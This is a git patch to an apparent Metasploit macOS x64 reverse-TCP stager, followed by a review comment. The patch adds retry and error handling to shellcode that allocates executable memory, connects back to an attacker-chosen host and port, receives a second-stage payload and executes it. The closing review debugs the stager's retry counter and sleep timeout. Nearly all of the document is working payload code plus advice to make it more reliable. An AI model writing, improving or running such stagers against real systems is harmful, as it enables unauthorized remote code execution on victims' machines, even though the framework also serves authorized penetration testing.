From beda2d1efb98411c6e6fc2792ad0f451d65cde1d Mon Sep 17 00:00:00 2001
From: Tim W
Date: Fri, 5 Jan 2018 02:13:20 +0800
Subject: [PATCH] add retries and error checking to osx stager
---
 .../payloads/stagers/osx/x64/reverse_tcp.rb | 126 ++++++++++++------
 1 file changed, 83 insertions(+), 43 deletions(-)
diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
index 6c9ce426a3..152c8a90c3 100644
--- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
@@ -27,61 +27,101 @@ module MetasploitModule def generate(opts = {}) encoded_port = "%.8x" % [datastore['LPORT'].to_i,2].pack("vv").unpack("N").first encoded_host = "%.8x" % Rex::Socket.addr_aton(datastore['LHOST']||"127.127.127.127").unpack("V").first - stager_asm = %( - mov rcx, ~0x#{encoded_host}#{encoded_port} - not rcx - push rcx - xor ebp, ebp - bts ebp, 25 + retry_count = datastore['StagerRetryCount'] + seconds = datastore['StagerRetryWait'] + sleep_seconds = seconds.to_i + sleep_nanoseconds = (seconds % 1 * 1000000000).to_i + stager_asm = %( + ; mmap(0x0, 0x1000, 0x7, 0x1002, 0x0, 0x0) + push 0 + pop rdi + push 0x1000 + pop rsi + push 7 + pop rdx + push 0x1002 + pop r10 + push 0 + pop r8 + push 0 + pop r9 + push 0x20000c5 + pop rax + syscall + jb failed + + mov r12, rax + push 0 + pop r10 + push #{retry_count} + pop r11 + + socket: ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP); - push rbp - pop rax - cdq ; rdx=IPPROTO_IP - push 1 - pop rsi ; rsi=SOCK_STREAM push 2 pop rdi ; rdi=AF_INET - mov al, 97 + push 1 + pop rsi ; rsi=SOCK_STREAM + push 0 + pop rdx ; rdx=IPPROTO_IP + push 0x2000061 + pop rax syscall - - mov r13, rax - xchg eax, edi ; edi=s - xchg eax, esi ; esi=2 + jb retry ; connect (sockfd, {AF_INET,4444,127.0.0.1}, 16); - push rbp - pop rax + mov rdi, rax + mov rax, ~0x#{encoded_host}#{encoded_port} + not rax + push rax push rsp pop rsi - mov dl, 16 ; rdx=sizeof(sa) - mov al, 98 ; rax=sys_connect + push 16 + pop rdx + push 0x2000062 + pop rax syscall + jb retry - ; mmap(0x0, 0x1000, 0x7, 0x1002, 0x0, 0x0) - pop r11 - mov rsi, r11 - xor rdi, rdi - mov rsi, 0x1000 - mov eax, 0x20000c5 - mov edx, 7 - mov r10, 0x1002 - xor r8, r8 - xor r9, r9 - syscall - - ; recvfrom(0x3, addr, 0x1000) - mov rsi, rax - push rsi - mov rdi, r13 - xor rcx, rcx - mov rdx, 0x1000 - xor r10, r10 - xor r8, r8 - mov eax, 0x200001d - syscall + ; recvfrom(sockfd, addr, 0x1000) + mov rsi, r12 + push 0x1000 + pop rdx + push 0x200001d pop rax - call rax + syscall + jb retry + + call 
r12 + + retry: + dec r11 + jz failed + + push 0 + pop rdi + push 0 + pop rsi + push 0 + pop rdx + push 0 + pop r10 + push 0x#{sleep_nanoseconds.to_s(16)} + push 0x#{sleep_seconds.to_s(16)} + push rsp + pop r8 + push 0x200005d + pop rax + syscall + jmp socket + + failed: + push 0x2000001 + pop rax + push 0x1 + pop rdi + syscall ; exit(1) ) Metasm::Shellcode.assemble(Metasm::X64.new, stager_asm).encode_string
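Review bot: The retry counter does not survive the syscalls it is meant to count: `pop r11` before `socket:` loads it once, but the SYSCALL instruction stores RFLAGS in r11 (and RIP in rcx) on every entry and XNU's sysret path returns with r11 holding the user RFLAGS, so `dec r11` / `jz failed` at `retry:` is decrementing a flags value and StagerRetryCount never bounds the loop — a loop that also re-enters socket() on each pass without a close() of the previous descriptor. Keep the count in a register the syscall instruction leaves alone and no syscall argument uses, e.g. `pop r13` in place of `pop r11` and `dec r13` at `retry:` (r13 became free when the old `mov r13, rax` was dropped). Separately, 0x200005d is select, whose timeout is a struct timeval in microseconds, so the value pushed as `0x#{sleep_nanoseconds.to_s(16)}` should be `((seconds % 1) * 1_000_000).to_i`; a fractional StagerRetryWait currently yields tv_usec >= 1000000, which select rejects with EINVAL, and since that syscall has no `jb` the loop retries with no wait at all. The `seconds % 1` / `* 1000000000` arithmetic also assumes datastore['StagerRetryWait'] is already numeric while LPORT two lines above needs `.to_i`, so `seconds = datastore['StagerRetryWait'].to_f` would avoid String#% and String#* semantics if the option arrives as a string. The closing `end` of generate lies past the visible end of the hunk.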